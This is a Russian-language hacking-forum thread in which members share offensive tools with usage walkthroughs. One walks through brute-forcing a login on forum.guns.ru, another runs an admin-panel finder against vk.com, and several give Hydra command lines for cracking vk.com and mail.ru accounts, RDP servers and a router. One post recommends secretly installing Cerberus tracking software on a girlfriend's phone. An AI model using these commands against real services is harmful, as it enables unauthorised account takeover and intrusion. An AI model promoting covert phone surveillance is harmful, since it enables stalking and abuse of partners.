Тут обсуждаем программное обеспечение, которое так или иначе применимо для хакерства, анализа на уязвимости и прочего. Правила: 1. Одна программа - один пост. 2. Ссылки на скачивание только на оффициальные источники, никаких хакир.ру. Если программа находится у вас на компьютере, заливаем на .onion хостинг и выкладываем ссылку. 3. Не торопитесь скачивать предложенные программы на свой компьютер, проверьте ее на вирусы/отправку левых пакетов на виртуальной машине. 4. Желательно указывать операционную систему. Желательно описать личный опыт использования, проблемы/ошибки возникшие в процессе.
Начну первым. Эта программа отлично подойдет всем начинающим. С ней можно освоить основные принципы брутофорса. [Web] BruteForcer Платформа: Windows. [ Возможности ] [+] Брут методом POST [+] Брут методом GET [+] Брут Basic-авторизации (методом HEAD) [+] Брут FTP [+] Многопоточность (1 ~ 1000 потоков) [+] Возможность установки дополнительных Request (GET/POST) переменных. [+] Возможность установки Cookies. [+] Брут с использованием прокси (встроенный ротатор прокси с функцией авточека и настраиваемой автосменой) [+] 3 режима атаки: - Атака 1 логина - Атака нескольких логинов - Атака по 1 паролю [ Дополнительные возможности ] [+] Встроенный браузер plain HTML с подсветкой тегов input и показом заголовков, полученных от сайта. [+] Менеджер словарей (Генерация, склейка, разбивка) Примечания: - Программа требует наличия .NET Framework > 2.0 - Настройки хранятся в файле Config.xml - Сохранённые элементы из ComboBox'ов можно удалять нажатием Ctrl+Delete. - При запуске с ключём /oldstyle программа будет иметь старый стиль оформления. - При смене tab'a GUI немного подтормаживает. - Старайтесь в индикаторе не использовать кириллические символы (так как некоторые сайты посылают неверную кодировку в заголовке). Работа брута на примере сайта forum.guns.ru: 1. Первым делом заходим на страницу Login'a нужного нам сайта. Жмем "Просмотр кода страницы", если используем Chrome. 2. Смотрим код страницы и заполняем поля программы нужной нам информацией. На скриншоте можно заметить, что в поле "Индикация успешного входа" стоит "Ошибка 2". Заполнить это поле можно несколькими способами: 1. Ввести неверный логин и посмотреть какой текст будет присутствовать в коде страницы. 2. Ввести верный логин и посмотреть какой текст будет присутствовать в коде страницы. Далее заполнить поле на присутствие/отсутсвие нужного текста. 3. Выбираем способ перебора: 1. Для определенного логина. 2. Для связки логин/пароль 3. Для определенного пароля. Пример для второго случая: 4. Если нужно сбрутить один аккаунт, то в дополнительных настройках я снимаю галочку "Останавливать атаку после первой успешной попытки". Увидел успешный вход - проверил, нет смысла останавливать брут на этом этапе, пусть работает. Вход бывает ложным, если настроили криво например. 5. Подсовываем лист с проксями, устанавливаем интервал смены одного прокси-сервера. Устанавливаем количество потоков и вперед. Жмем "Старт". Брут настроен и работает. Скачать программу можно здесь: тык. ВНИМАНИЕ! Хотя сайт, якобы, оффициальный, антивирус (Avast!) на брут все равно ругается. Лучше запускать с виртуальной машины. В старой версии программы был простой генератор словарей, позволяющий сгенерировать пары логин/пароль. PS Пик с работающим брутом потерялся, поэтому вставил какой был
AdminFinder Описание: Питоновский скрипт для нахождения админки исследуемого сайта путём перебора наиболее частых имен. Возможно использование различных технологий, таких как php,html,asp и других. Находится под разными названиями, например в arch linux это будет adminpagefinder. Использование: -> adminpagefinder AdminFinder Описание: Питоновский скрипт для нахождения админки исследуемого сайта путём перебора наиболее частых имен. Возможно использование различных технологий, таких как php,html,asp и других. Находится под разными названиями, например в arch linux это будет adminpagefinder. Использование: -> adminpagefinder -> vk.com Checking website vk.com... [$] Yes... Server is Online. Enter site source code: 1 PHP 2 ASP 3 CFM 4 JS 5 CGI 6 BRF Press 1 and 'Enter key' for Select PHP -> 1 [+] Scanning vk.com... [#] Checking vk.com/admin/... [#] Checking vk.com/administrator/... [#] Checking vk.com/admin1/... [#] Checking vk.com/admin2/... [#] Checking vk.com/admin3/... [#] Checking vk.com/admin4/... [#] Checking vk.com/admin5/... [#] Checking vk.com/usuarios/... [#] Checking vk.com/usuario/... [#] Checking vk.com/administrator/... [#] Checking vk.com/moderator/... [#] Checking vk.com/webadmin/... [#] Checking vk.com/adminarea/... [#] Checking vk.com/bb-admin/... [#] Checking vk.com/adminLogin/... [#] Checking vk.com/admin_area/... [#] Checking vk.com/panel-administracion/... [#] Checking vk.com/instadmin/... [#] Checking vk.com/memberadmin/... [#] Checking vk.com/administratorlogin/... [#] Checking vk.com/adm/... [#] Checking vk.com/admin/account.php... [#] Checking vk.com/admin/index.php... [#] Checking vk.com/admin/login.php... [#] Checking vk.com/admin/admin.php... [#] Checking vk.com/admin/account.php... [#] Checking vk.com/admin_area/admin.php... [#] Checking vk.com/admin_area/login.php... [#] Checking vk.com/siteadmin/login.php... [#] Checking vk.com/siteadmin/index.php... [#] Checking vk.com/siteadmin/login.html... [#] Checking vk.com/admin/account.html... [#] Checking vk.com/admin/index.html... [#] Checking vk.com/admin/login.html... [#] Checking vk.com/admin/admin.html... [#] Checking vk.com/admin_area/index.php... [#] Checking vk.com/bb-admin/index.php... [#] Checking vk.com/bb-admin/login.php... [#] Checking vk.com/bb-admin/admin.php... [#] Checking vk.com/admin/home.php... [#] Checking vk.com/admin_area/login.html... [#] Checking vk.com/admin_area/index.html... [#] Checking vk.com/admin/controlpanel.php... [#] Checking vk.com/admin.php... >>>vk.com/admin.php Possible admin page (302 - Redirect) [#] Checking vk.com/admincp/index.asp... [#] Checking vk.com/admincp/login.asp... [#] Checking vk.com/admincp/index.html... [#] Checking vk.com/admin/account.html... [#] Checking vk.com/adminpanel.html... [#] Checking vk.com/webadmin.html... [#] Checking vk.com/webadmin/index.html... [#] Checking vk.com/webadmin/admin.html... [#] Checking vk.com/webadmin/login.html... [#] Checking vk.com/admin/admin_login.html... [#] Checking vk.com/admin_login.html... [#] Checking vk.com/panel-administracion/login.html... [#] Checking vk.com/admin/cp.php... [#] Checking vk.com/cp.php... [#] Checking vk.com/administrator/index.php... [#] Checking vk.com/administrator/login.php... [#] Checking vk.com/nsw/admin/login.php... [#] Checking vk.com/webadmin/login.php... [#] Checking vk.com/admin/admin_login.php... [#] Checking vk.com/admin_login.php... [#] Checking vk.com/administrator/account.php... [#] Checking vk.com/administrator.php... [#] Checking vk.com/admin_area/admin.html... [#] Checking vk.com/pages/admin/admin-login.php... [#] Checking vk.com/admin/admin-login.php... [#] Checking vk.com/admin-login.php... [#] Checking vk.com/bb-admin/index.html... [#] Checking vk.com/bb-admin/login.html... [#] Checking vk.com/acceso.php... [#] Checking vk.com/bb-admin/admin.html... [#] Checking vk.com/admin/home.html... [#] Checking vk.com/login.php... >>>vk.com/login.php Possible admin page (302 - Redirect) [#] Checking vk.com/modelsearch/login.php... [#] Checking vk.com/moderator.php... [#] Checking vk.com/moderator/login.php... [#] Checking vk.com/moderator/admin.php... [#] Checking vk.com/account.php... [#] Checking vk.com/pages/admin/admin-login.html... [#] Checking vk.com/admin/admin-login.html... [#] Checking vk.com/admin-login.html... [#] Checking vk.com/controlpanel.php... [#] Checking vk.com/admincontrol.php... [#] Checking vk.com/admin/adminLogin.html... [#] Checking vk.com/adminLogin.html... [#] Checking vk.com/admin/adminLogin.html... [#] Checking vk.com/home.html... [#] Checking vk.com/rcjakar/admin/login.php... [#] Checking vk.com/adminarea/index.html... [#] Checking vk.com/adminarea/admin.html... [#] Checking vk.com/webadmin.php... [#] Checking vk.com/webadmin/index.php... [#] Checking vk.com/webadmin/admin.php... [#] Checking vk.com/admin/controlpanel.html... [#] Checking vk.com/admin.html... >>>vk.com/admin.html Admin page found! Press enter to continue scanning. О программе: Полезный скрипт. По большей части всегда когда вы не находите админку у сайта, проверив изначально разумеется на какой технологии он сделан и затем выбрав её, то это значит что админка либо отсутствует, либо админ параноик)))
Nmap Описание: Одна из самых популярных программ для скана сетей. Настолько популярна, что встречается даже в некоторых фильмах о хакерстве, технологиях и тд. Кроссплатформена. Имеет свой графический интерфейс под названием Zenmap. Примечательна тем, что расширяема путем написания скриптов на простом языки lua. Также в обычной сборке имеется большое количество этих самых скриптов для разных нужд. Тут вам и сразу проверить уязвимости и сбрутить сервак и многое другое. Скачать: Найти ссылки на скачивание можно на официальном сайте проекта. http://nmap.org/download.html Также здесь вы можете найти скрипты для nmap различных категорий - http://nmap.org/nsedoc/ Примеры использования: -> nmap -sP 192.168.1.0/24 (Сканим локальную сеть на живые хосты) -> nmap -O site.com (Определяем ОС сканируемого хоста) -> nmap -v localhost (С помощью опции -v мы можем увидеть расширенный вывод) -> nmap -F google.com (Данная опция позволяет просканировать наиболее частые порты) -> nmap -d --script ssl-heartbleed --script-args vulns.showall -sV X.X.X.X/24 (Проверка на уязвимость с использованием скрипта lua) О программе: Незаменимая программа в нашем деле. Если только начали использовать её предлагаю пошариться по официальному сайту и почитать. Там очень много полезной информации.
THC-Hydra Описание: Знаменитый брутфорсер. Поддерживает громадное количество протоколов, сервисов и технологий для перебора. Есть возможность гибко настраивать программу для взлома веб-форм страниц различных ресурсов. Многопоточный брут. Также существует способ запуска через прокси путем указания специальной переменной окружения. Поддерживает только http-proxy. К сожалению невозможно использовать лист прокси, если возникает необходимость в такого рода задачах можно просто автоматизировать смену прокси в определенных случаях с помощью скрипта или же если нужно использовать другие типы прокси можно туннелировать программу с помощью специальных утилит. Скачать: Пользователи Линукса могут скачать программу в своих репозиториях. Другие же могут заглянуть на официальный сайт - https://www.thc.org/thc-hydra/ Примеры использования: -> export HYDRA_PROXY_HTTP="iport" (Задание прокси для hydra) -> hydra -L emails.txt -P passwords.txt login.vk.com http-post-form -m "/?act=login:act=login&q=1&al_frame=1&expire=&captcha_sid=&captcha_key=&from_host=vk.com&from_protocol=http&email=^USER^&pass=^PASS^:login.php" -t 1 -fvV (Пример настройки программы для взлома вк, старый, не знаю рабочий ли в настоящее время. ^USER - заменяется программой на значение логина из словаря, ^PASS на значение пароля. Значение после двоеточия определяет, то в каком случае считать попытку взлома не успешным. Если сервер в запросе возвращает данную строку то продолжаем брутить) -> hydra -L login.txt -P pass.txt -vV -o good_rdp.txt -t 4 -M ip.txt rdp (Пример брута дедиков. Параметр -vV определяет расширенный вывод, -o выходной файл с удачными результатами, -t количество потоков, -M откуда берём айпишники для брута) -> hydra.exe -C combine.txt -o results.txt -vV pop.mail.ru pop3 (Ломаем почту на mail.ru. Параметр -C означает файл в котором каждая строка заполнена значениями loginass) -> hydra -l admin -P pass.txt 192.168.1.1 http-get -m / (Пример взлома админки роутера с единственным логином admin) О программе: Один из лучших брутфорсеров, который можно при желании применить для различных целей, без необходимости писать отдельную программу лично.
SQLMAP - sqlmap.org Прога для автоматизации вытаскивания информации из базы данных уязвимого сайта (SQL иньекция) Поддерживает кучу баз данных, само собой основные типа MySQL, MSSQL, PG, а также такую экзотику как Оракл. Работа возможна через ТОР, прокси. Есть возможность иньекции через гет и пост запросы, анализ и иньекция через веб формы. Fierce ha.ckers.org/fierce - перловский скрипт для запросов в днс и поиска поддоменов на атакуемом сайте. Отличное средство для поиска поддоменов, где можно обнаружить дыры, которых нет на основном сайте
tox программа как скайп только безопасная. Регистрироваться не нужна даже в ней. Программа автоматически присваивает tox id. Сайт: tox.im/ru Через обычный интернет не заходит Роскомнадзор заблокировал... Через tor можно скачать без проблем. cerberus программа для слежения за дропами, можно и за девушкой. Минус один и очень большой что только на Android работает... Но зато программа делает кучу всего... И звонки записывает и фото снимает и видео и место расположения определяет т.д. play.google.com/store/apps/details?id=com.lsdroid.cerberus&hl=ru Программу можно установить жертве и скрыть её что-бы человек не видел. Следить за устройствами можно через сайт cerberusapp.com Жалко на ios такого аналога не знаю... Так бы можно было в айфон тёлочке поставить... Специально даже думаю взять тёлочке второй телефон Sony Xperia Z3 заинтересовав хорошей камерой 20.70 МП и установить ей туда эту программу. Если кто-то знает программу подобную на ios прошу написать в теме. WiFi Map — Пароли к вай-фай в России и по всему миру Программа на ios показывает ближайшие точки доступа wi-fi с паролями. Суть программы в том что-бы все друг другу помогали. Например находясь в кафе зная пароль точки доступа можно внести в программу пароль от точки доступа. В дальнейшем возможно и самому и многим пригодится. В программе боле 2 000 000 паролей itunes.apple.com/ru/app/wifi-map-paroli-i-besplatnyj/id548925969?mt=8
Эммм nmap Zenmap, чувак ты уверен, что она годна? Какая она к чёрту хакерская, так для ленивых сисадминов для скана локалки. Ну предположим ты приходишь на предприятие и вдруг ты можешь воткнуться (просто подругому не получится) и сканишь задаёшь стандарт 192,168,1* и при норм скорости у тебя займёт время минут 30-40 на глубокий скан ИИИИ что же мы максимум увидем? список ip и централизацию их к узлу + фаервол...ИИИ как бы всё))) Ах да ещё порты))) Так вот чем эта инфа может тебе помочь?
СКАЧИВАЕМ САЙТ ЦЕЛИКОМ Скачиваем всю директорию хттп.docs wget -r -k -l 7 -p -E -nc хттп.сайт.ру -r — указывает на то, что нужно рекурсивно переходить по ссылкам на сайте, чтобы скачивать страницы. -k — используется для того, чтобы wget преобразовал все ссылки в скаченных файлах таким образом, чтобы по ним можно было переходить на локальном компьютере (в автономном режиме). -p — указывает на то, что нужно загрузить все файлы, которые требуются для отображения страниц (изображения, css и т.д.). -l — определяет максимальную глубину вложенности страниц, которые wget должен скачать (по умолчанию значение равно 5, в примере мы установили 7). В большинстве случаев сайты имеют страницы с большой степенью вложенности и wget может просто «закопаться», скачивая новые страницы. Чтобы этого не произошло можно использовать параметр -l. -E — добавлять к загруженным файлам расширение .html. -nc — при использовании данного параметра существующие файлы не будут перезаписаны. Это удобно, когда нужно продолжить загрузку сайта, прерванную в предыдущий раз.
